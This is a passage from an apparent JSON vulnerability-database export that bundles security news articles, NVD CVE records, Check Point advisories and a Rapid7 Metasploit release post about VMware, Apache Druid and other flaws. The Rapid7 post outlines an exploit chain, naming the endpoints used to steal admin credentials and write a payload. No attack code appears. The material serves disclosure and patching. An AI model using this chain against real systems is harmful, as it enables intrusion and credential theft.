With that you can add an auto forward rule to the victim\u2019s Mail application.\u201d\n\nThis arbitrary write access means that an attacker can manipulate all of the files in $HOME/Library/Mail, he added.\n\nCVE-2020-9922 is rated 6.5 on the CVSS vulnerability-severity scale, making it medium-severity, but the researcher stressed that successful exploitation could \u201clead to many bad things.\u201d\n\n\u201cAs shown, this will lead to exposure of the sensitive data to a third party through manipulating the Mail application\u2019s configuration,\u201d he said. \u201cOne of the available configuration options is the user\u2019s signature which could be used to make this vulnerability wormable. There is also a chance that this could lead to a remote code-execution (RCE) vulnerability, but I didn\u2019t go that far.\u201d\n\n**_Check out our free _**[**_upcoming live webinar events_**](<https://threatpost.com/category/webinars/>)**_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>))\n\n** **\n", "cvss3": {}, "published": "2021-04-05T19:10:53", "type": "threatpost", "title": "Apple Mail Zero-Click Security Vulnerability Allows Email Snooping", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-9922", "CVE-2021-21982"], "modified": "2021-04-05T19:10:53", "id": "THREATPOST:E3FA0D5BB017B7DD39D5924D32A9A668", "href": "https://threatpost.com/apple-mail-zero-click-security-vulnerability/165238/", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-06-25T16:18:48", "description": "VMware has fixed an uber-severe bug in its Carbon Black App Control (AppC) management server: A server whose job is to lock down critical systems and servers so they don\u2019t 
get changed willy-nilly.\n\nAppC also ensures that organizations stay in continuous compliance with regulatory mandates.\n\nThis is a bad one: VMware puts the flaw, [CVE-2021-21998](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21998>), in the critical severity range with a maximum CVSSv3 base score of 9.4 out of 10. The bug is an authentication bypass that could enable an attacker with network access to the server to get administrative privileges without needing to authenticate.\n\nAccording to VMware\u2019s [advisory](<https://www.vmware.com/security/advisories/VMSA-2021-0012.html>), the authentication-bypass bug affects AppC versions 8.0, 8.1, 8.5 before 8.5.8, and 8.6 before 8.6.2.\n\nAs pointed out by [Heimdal Security](<https://heimdalsecurity.com/blog/vmware-fixes-severe-carbon-black-app-control-authentication-bypass-vulnerability/>), depending on the environment, threat actors could exploit the vulnerability \u201cto maximum advantage to attack anything from point-of-sale [systems] (PoS) to industrial-control systems.\u201d\n\nTo avoid that, organizations must patch, as there are no workarounds available.\n\nBelow are the patches, listed in the Fixed Version column of VMware\u2019s Response Matrix:\n\nProduct | Version | Running On | CVE Identifier | CVSSv3 | Severity | Fixed Version | Version Workarounds | Additional Documentation \n---|---|---|---|---|---|---|---|--- \nAppC | 8.6.x | Windows | CVE-2021-21998 | 9.4 | critical | 8.6.2 | None | None \nAppC | 8.5.x | Windows | CVE-2021-21998 | 9.4 | critical | 8.5.8 | None | None \nAppC | 8.1.x, 8.0.x | Windows | CVE-2021-21998 | 9.4 | critical | Hotfix | None | None \n \nCredit for discovering and reporting CVE-2021-21998 goes to [Zeeshan Shaikh](<https://twitter.com/bugzzzhunter>) from NotSoSecure, who worked with Trend Micro Zero Day Initiative (ZDI) and [Hou JingYi](<https://twitter.com/hjy79425575>) of Qihoo 360.\n\n## Plus This: 
High-Risk Bug in Other VMware Products\n\nBesides the authentication-bypass fix, VMware also published a security advisory for a high-risk bug in VMware Tools, VMware Remote Console for Windows (VMRC), and VMware App Volumes products.\n\nAt this point, the bug doesn\u2019t have a severity score from the National Institute of Standards and Technology (NIST), but VMware evaluated it at 7.8 (high severity). The flaw, [CVE-2021-21999](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21999>), is a local privilege-escalation vulnerability.\n\nVMware\u2019s [advisory](<https://www.vmware.com/security/advisories/VMSA-2021-0013.html>) lists the affected products as VMware Tools for Windows (11.x.y prior to 11.2.6), VMware Remote Console for Windows (12.x prior to 12.0.1) , and VMware App Volumes (2.x prior to 2.18.10 and 4 prior to 2103).\n\nOnce again, there\u2019s no workaround for this one. Admins should patch it as soon as possible, given what VMware said can be done with it:\n\n> An attacker with normal access to a virtual machine may exploit this issue by placing a malicious file renamed as `openssl.cnf\u2019 in an unrestricted directory which would allow code to be executed with elevated privileges.\n\n## History of Critical Holes\n\nThe security hole in AppC is only the latest critical problem that VMware has addressed. In February, for one, VMware [patched three vulnerabilities](<https://threatpost.com/vmware-patches-critical-rce-flaw-in-vcenter-server/164240/>) in its virtual-machine infrastructure for data centers, including a remote code-execution (RCE) flaw in its vCenter Server management platform. 
The vulnerability could allow attackers to breach the external perimeter of an enterprise data center or leverage backdoors already installed on a system, to find other vulnerable points of network entry to take over affected systems.\n\nMore recently, in April, another [critical cloud bug](<https://threatpost.com/critical-cloud-bug-vmware-carbon-black/165278/>), again in VMWare Carbon Black, would have allowed takeover. The bug (CVE-2021-21982) ranked 9.1 out of 10 on the CVSS vulnerability-severity scale. It would enable privilege escalation and the ability to take over the administrative rights for the VMware Carbon Black Cloud Workload appliance.\n\n**Join Threatpost for \u201c**[**Tips and Tactics for Better Threat Hunting**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)**\u201d \u2014 a LIVE event on **[**Wed., June 30 at 2:00 PM ET**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)** in partnership with Palo Alto Networks. Learn from Palo Alto\u2019s Unit 42 experts the best way to hunt down threats and how to use automation to help. **[**Register HERE**](<https://threatpost.com/webinars/tips-and-tactics-for-better-threat-hunting/?utm_source=ART&utm_medium=ART&utm_campaign=June_PaloAltoNetworks_Webinar>)** for free. 
**\n", "cvss3": {}, "published": "2021-06-24T15:31:31", "type": "threatpost", "title": "Critical VMware Carbon Black Bug Allows Auth Bypass", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-3580", "CVE-2021-21982", "CVE-2021-21998", "CVE-2021-21999"], "modified": "2021-06-24T15:31:31", "id": "THREATPOST:9AD64DC6BE4117F56E76B2BF8F28A597", "href": "https://threatpost.com/vmware-carbon-black-authentication-bypass/167226/", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "cve": [{"lastseen": "2022-03-23T13:56:08", "description": "VMware Carbon Black Cloud Workload appliance 1.0.0 and 1.01 has an authentication bypass vulnerability that may allow a malicious actor with network access to the administrative interface of the VMware Carbon Black Cloud Workload appliance to obtain a valid authentication token. Successful exploitation of this issue would result in the attacker being able to view and alter administrative configuration settings.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-04-01T19:15:00", "type": "cve", "title": "CVE-2021-21982", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21982"], "modified": "2021-04-06T16:29:00", "cpe": ["cpe:/a:vmware:carbon_black_cloud_workload:1.0.1"], "id": "CVE-2021-21982", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21982", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:vmware:carbon_black_cloud_workload:1.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:55:56", "description": "Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T18:15:00", "type": "cve", "title": "CVE-2021-21975", "cwe": ["CWE-918"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-02-01T17:45:00", "cpe": ["cpe:/a:vmware:vrealize_operations_manager:8.1.1", "cpe:/a:vmware:cloud_foundation:3.7.2", "cpe:/a:vmware:cloud_foundation:3.8.1", 
"cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.1", "cpe:/a:vmware:cloud_foundation:3.8", "cpe:/a:vmware:cloud_foundation:3.0.1.1", "cpe:/a:vmware:vrealize_operations_manager:8.0.1", "cpe:/a:vmware:vrealize_operations_manager:7.0.0", "cpe:/a:vmware:cloud_foundation:3.0.1", "cpe:/a:vmware:cloud_foundation:3.7", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.0", "cpe:/a:vmware:cloud_foundation:3.10", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.0.1", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.2", "cpe:/a:vmware:vrealize_operations_manager:8.3.0", "cpe:/a:vmware:vrealize_operations_manager:7.5.0", "cpe:/a:vmware:cloud_foundation:3.9.1", "cpe:/a:vmware:cloud_foundation:4.0.1", "cpe:/a:vmware:cloud_foundation:3.0", "cpe:/a:vmware:vrealize_operations_manager:8.1.0", "cpe:/a:vmware:cloud_foundation:3.5", "cpe:/a:vmware:cloud_foundation:3.7.1", "cpe:/a:vmware:cloud_foundation:4.0", "cpe:/a:vmware:cloud_foundation:3.5.1", "cpe:/a:vmware:vrealize_operations_manager:8.0.0", "cpe:/a:vmware:cloud_foundation:3.9", "cpe:/a:vmware:vrealize_operations_manager:8.2.0"], "id": "CVE-2021-21975", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21975", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:vmware:vrealize_operations_manager:8.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.8:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:7.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.9:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.2:*:*:*:*:*:*:*", 
"cpe:2.3:a:vmware:cloud_foundation:3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.7:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.0.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.10:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:56:09", "description": "Arbitrary file write vulnerability in vRealize Operations Manager API (CVE-2021-21983) prior to 8.4 may allow an authenticated malicious actor with network access to the vRealize Operations Manager API can write files to arbitrary locations on the underlying photon operating system.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2021-03-31T18:15:00", "type": "cve", "title": "CVE-2021-21983", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21983"], "modified": "2022-02-01T17:45:00", "cpe": ["cpe:/a:vmware:vrealize_operations_manager:8.1.1", "cpe:/a:vmware:cloud_foundation:3.7.2", "cpe:/a:vmware:cloud_foundation:3.8.1", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.1", "cpe:/a:vmware:cloud_foundation:3.8", "cpe:/a:vmware:cloud_foundation:3.0.1.1", "cpe:/a:vmware:vrealize_operations_manager:8.0.1", "cpe:/a:vmware:vrealize_operations_manager:7.0.0", "cpe:/a:vmware:cloud_foundation:3.0.1", "cpe:/a:vmware:cloud_foundation:3.7", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.0", "cpe:/a:vmware:cloud_foundation:3.10", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.0.1", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.2", "cpe:/a:vmware:vrealize_operations_manager:8.3.0", "cpe:/a:vmware:vrealize_operations_manager:7.5.0", "cpe:/a:vmware:cloud_foundation:3.9.1", "cpe:/a:vmware:cloud_foundation:4.0.1", "cpe:/a:vmware:cloud_foundation:3.0", "cpe:/a:vmware:vrealize_operations_manager:8.1.0", "cpe:/a:vmware:cloud_foundation:3.5", "cpe:/a:vmware:cloud_foundation:3.7.1", "cpe:/a:vmware:cloud_foundation:4.0", "cpe:/a:vmware:cloud_foundation:3.5.1", "cpe:/a:vmware:vrealize_operations_manager:8.0.0", "cpe:/a:vmware:cloud_foundation:3.9", "cpe:/a:vmware:vrealize_operations_manager:8.2.0"], "id": "CVE-2021-21983", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-21983", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "cpe23": ["cpe:2.3:a:vmware:vrealize_operations_manager:8.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.8:*:*:*:*:*:*:*", 
"cpe:2.3:a:vmware:cloud_foundation:3.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:7.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.9:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.7:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.0.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations_manager:8.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:3.10:*:*:*:*:*:*:*"]}], "rapid7blog": [{"lastseen": "2021-04-30T18:51:30", "description": "## Operations shell\n\n\n\nOperations and management software make popular targets due to their users typically having elevated privileges across a network. 
Our own [wvu](<https://github.com/wvu-r7>) contributed the [VMware vRealize Operations (vROps) Manager SSRF RCE](<https://github.com/rapid7/metasploit-framework/pull/15005>) exploit module for the vulnerabilities discovered by security researcher Egor Dimitrenko. The `exploit/linux/http/vmware_vrops_mgr_ssrf_rce` module achieves remote code execution (RCE) as the `admin` Unix user by chaining the two vulnerabilities. First, the [CVE-2021-21975](<https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975?referrer=blog#rapid7-analysis>) pre-authentication server-side request forgery (SSRF) vulnerability is exploited in the `/casa/nodes/thumbprints` endpoint to obtain the admin credentials. Then, the credentials are used to authenticate to the vRealize Operations Manager API and exploit [CVE-2021-21983](<https://attackerkb.com/topics/uzsEZjT0Sc/cve-2021-21983?referrer=blog>) via the `/casa/private/config/slice/ha/certificate` endpoint. This allows the module to write and execute an arbitrary file, a JSP payload in this case. The module should work against the following vulnerable versions:\n\n * 7.0.0\n * 7.5.0\n * 8.0.0, 8.0.1\n * 8.1.0, 8.1.1\n * 8.2.0\n\n## Data rules everything around me\n\nMany dynamic websites and business applications have associated databases, so databases are commonplace on networks. Odds are you frequently encounter more than one database on an engagement. The release this week includes two new database-related modules!\n\nThe first is an [Apache Druid RCE](<https://github.com/rapid7/metasploit-framework/pull/14977>) exploit module for a vulnerability in versions 0.20.0 and older. The vulnerability, [CVE-2021-25646](<https://attackerkb.com/topics/lOVKwIVWHg/cve-2021-25646?referrer=blog>), was discovered by Litch1, and [je5442804](<https://github.com/je5442804>) contributed the module. 
The second, a gather module named [Redis Extractor](<https://github.com/rapid7/metasploit-framework/pull/14702>) contributed by [Geoff Rainville (noncenz)](<https://github.com/noncenz>) enables easy looting of any key-value stores you discover.\n\n## New Module Content (5)\n\n * [Redis Extractor](<https://github.com/rapid7/metasploit-framework/pull/14702>) by Geoff Rainville noncenz - Adds a module to retrieve all data from a Redis instance (version 2.8.0 and above).\n * [Apache Druid 0.20.0 Remote Command Execution](<https://github.com/rapid7/metasploit-framework/pull/14977>) by Litch1, Security Team of Alibaba Cloud and je5442804, which exploits [CVE-2021-25646](<https://attackerkb.com/topics/lOVKwIVWHg/cve-2021-25646?referrer=blog>) \\- This adds an exploit module that targets Apache Druid versions prior to `0.20.1`. An authenticated user can send a single request that both enables the execution of user-provided JavaScript code and executes the code on the server with the privileges of the user running the Apache Druid process. 
By default, Apache Druid does not require authentication.\n * [VMware vRealize Operations (vROps) Manager SSRF RCE](<https://github.com/rapid7/metasploit-framework/pull/15005>) by wvu and Egor Dimitrenko, which exploits [CVE-2021-21983](<https://attackerkb.com/topics/uzsEZjT0Sc/cve-2021-21983?referrer=blog>) \\- This adds a module that exploits both a pre-auth SSRF and a post-auth file write via directory traversal to get code execution as the `admin` user on vulnerable VMware vRealize Operations Manager installs.\n * [Micro Focus Operations Bridge Reporter shrboadmin default password](<https://github.com/rapid7/metasploit-framework/pull/15086>) by Pedro Ribeiro, which exploits ZDI-20-1215 - This adds an exploit for [CVE-2020-11857](<https://attackerkb.com/topics/0rBqrv2UNX/cve-2020-11857?referrer=blog>) which is a hardcoded SSH password in Micro Focus Operations Bridge Manager instances.\n * [KOFFEE - Kia OFFensivE Exploit](<https://github.com/rapid7/metasploit-framework/pull/15021>) by Gianpiero Costantino and Ilaria Matteucci, which exploits [CVE-2020-8539](<https://attackerkb.com/topics/zXxJ29z090/cve-2020-8539?referrer=blog>) \\- This adds a post module that leverages the CVE-2020-8539 vulnerability on certain Kia Motors head units. 
This vulnerability is also known as KOFFEE.\n\n## Enhancements and features\n\n * [#11257](<https://github.com/rapid7/metasploit-framework/pull/11257>) from [sempervictus](<https://github.com/sempervictus>) \\- This PR adds the ability to wrap some powershell used for exploitation purposes with RC4 for obfuscation.\n * [#15014](<https://github.com/rapid7/metasploit-framework/pull/15014>) from [ctravis-r7](<https://github.com/ctravis-r7>) \\- Adds the ability to specify an individual private key as a string parameter into the `auxiliary/scanner/ssh/ssh_login_pubkey` module.\n * [#15110](<https://github.com/rapid7/metasploit-framework/pull/15110>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds the necessary functionality to the Java Meterpreter to resolve hostnames over DNS, closing a feature gap that had been present with other Meterpreters.\n\n## Bugs Fixed\n\n * [#14953](<https://github.com/rapid7/metasploit-framework/pull/14953>) from [bwatters-r7](<https://github.com/bwatters-r7>) \\- Fix the python 3.6 string formatting syntax in modules/auxiliary/scanner/http/rdp_web_login\n * [#15050](<https://github.com/rapid7/metasploit-framework/pull/15050>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) \\- Fixes a crash in Metasploit's console when the user tried to tab complete values such as file paths that were missing their final ending quote\n * [#15081](<https://github.com/rapid7/metasploit-framework/pull/15081>) from [cgranleese-r7](<https://github.com/cgranleese-r7>) \\- Updates the Microsoft SQL Server interesting data finder module to correctly handle the scenario where no interesting data is found. 
Previously this would result in a module crash.\n * [#15094](<https://github.com/rapid7/metasploit-framework/pull/15094>) from [timwr](<https://github.com/timwr>) \\- This fixed a bug in how certain Meterpreters would execute commands issued through `sessions -c`, where some would use a subshell while others would not.\n * [#15114](<https://github.com/rapid7/metasploit-framework/pull/15114>) from [smashery](<https://github.com/smashery>) \\- Updates the `auxiliary/scanner/redis/file_upload` module to correctly handle Redis instances that require authenticated access.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.41...6.0.42](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-04-22T13%3A32%3A25%2B10%3A00..2021-04-29T10%3A54%3A48-05%3A00%22>)\n * [Full diff 6.0.41...6.0.42](<https://github.com/rapid7/metasploit-framework/compare/6.0.41...6.0.42>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-04-30T17:42:19", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-11857", "CVE-2020-8539", "CVE-2021-21975", "CVE-2021-21983", "CVE-2021-25646"], "modified": "2021-04-30T17:42:19", "id": "RAPID7BLOG:B7FE1EAED2C3AB6161A7ADCBD8A34ADF", "href": "https://blog.rapid7.com/2021/04/30/metasploit-wrap-up-109/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-23T23:31:36", "description": "A server-side request forgery vulnerability exists in VMware vRealize Operations Manager. Successful exploitation of this vulnerability could possibly lead to an attacker accessing administrative credentials.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-02-23T00:00:00", "type": "checkpoint_advisories", "title": "VMware vRealize Operations Manager API Server Side Request Forgery (CVE-2021-21975)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": 
"AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-02-23T00:00:00", "id": "CPAI-2021-1066", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-06-07T16:06:23", "description": "An arbitrary file write vulnerability exists in VMware vRealize Operations Manager API. Successful exploitation of this vulnerability could result in code execution on the affected system.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-06-07T00:00:00", "type": "checkpoint_advisories", "title": "VMware vRealize Operations Manager API Arbitrary File Write (CVE-2021-21983)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21983"], "modified": "2022-06-07T00:00:00", "id": "CPAI-2022-0230", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2022-02-16T19:33:27", "description": "URL Directory Traversal Over HTTP Traffic.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": 
